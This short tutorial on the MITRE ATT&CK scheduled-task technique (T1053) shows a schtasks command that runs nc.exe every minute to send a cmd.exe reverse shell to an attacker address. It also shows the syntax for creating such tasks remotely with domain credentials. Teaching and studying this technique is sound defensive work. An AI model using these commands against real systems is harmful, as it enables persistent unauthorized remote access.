ID: T1053 Tactic: Execution, Persistence, Privilege Escalation
Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system.
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct a remote Execution as part of Lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
Let's create a task that keep a reverse shell alive every minute.
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe'
Schtask calling nc.exe to call back to attacking machine
As we can see here creating a task can be done with a simple syntax and I demonstrated with nc.exe binary which takes also arguments!, all that was needed is to be inside the double-quotes ("") and it will take arguments with spaces.These tasks can also be created remotely. All that is needed is the user to be an administrator or have proper permissions on the Remote machine.
In the schtasks help menu we see the arguments needed after
/createto create a task on a remote server. We can supply the username and password on the arguments to authenticate and create the task.
It would look something like this.
schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password[If password is not supplied it will prompt asking for one]